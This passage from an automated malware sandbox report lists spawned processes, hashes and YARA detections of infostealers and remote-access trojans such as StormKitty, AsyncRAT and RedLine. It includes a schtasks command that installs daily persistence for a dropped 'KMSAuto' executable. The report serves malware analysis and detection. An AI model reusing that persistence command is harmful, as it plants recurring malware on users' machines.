                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                • Detection: 74%, Virustotal, Browse
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:07:27:17
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:07:27:17
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:07:27:17
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe"
                                                                                                                                                                                                                                Imagebase:0x620000
                                                                                                                                                                                                                                File size:179'200 bytes
                                                                                                                                                                                                                                MD5 hash:68FAD5F5F8DE1C290DF5D3754B4AF358
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                • Detection: 74%, Virustotal, Browse
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:07:27:19
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe"
                                                                                                                                                                                                                                Imagebase:0xac0000
                                                                                                                                                                                                                                File size:328'192 bytes
                                                                                                                                                                                                                                MD5 hash:43F955115DFBA87CA3593A18EFD58CEF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                • Detection: 66%, Virustotal, Browse
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:07:27:19
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\KMSAuto\accc.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\KMSAuto\accc.exe"
                                                                                                                                                                                                                                Imagebase:0x6e0000
                                                                                                                                                                                                                                File size:631'296 bytes
                                                                                                                                                                                                                                MD5 hash:BED8CDCED2D57BE2BD750F0F59991ECD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                • Detection: 56%, Virustotal, Browse
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:07:27:19
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""
                                                                                                                                                                                                                                Imagebase:0x7ff693890000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:07:27:20
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:07:27:20
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe"
                                                                                                                                                                                                                                Imagebase:0x6f0000
                                                                                                                                                                                                                                File size:48'640 bytes
                                                                                                                                                                                                                                MD5 hash:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:07:27:20
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:timeout 7
                                                                                                                                                                                                                                Imagebase:0x7ff6b1a20000
                                                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:07:27:20
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe"
                                                                                                                                                                                                                                Imagebase:0x30000
                                                                                                                                                                                                                                File size:48'640 bytes
                                                                                                                                                                                                                                MD5 hash:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:07:27:23
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe"
                                                                                                                                                                                                                                Imagebase:0x620000
                                                                                                                                                                                                                                File size:64'512 bytes
                                                                                                                                                                                                                                MD5 hash:E52BA92D25281E90AA7F27BD3719951F
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:07:27:24
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe"
                                                                                                                                                                                                                                Imagebase:0xa70000
                                                                                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                                                                                MD5 hash:7081E613321921500B70899FDDB56A4D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:07:27:31
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:07:27:31
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:07:27:34
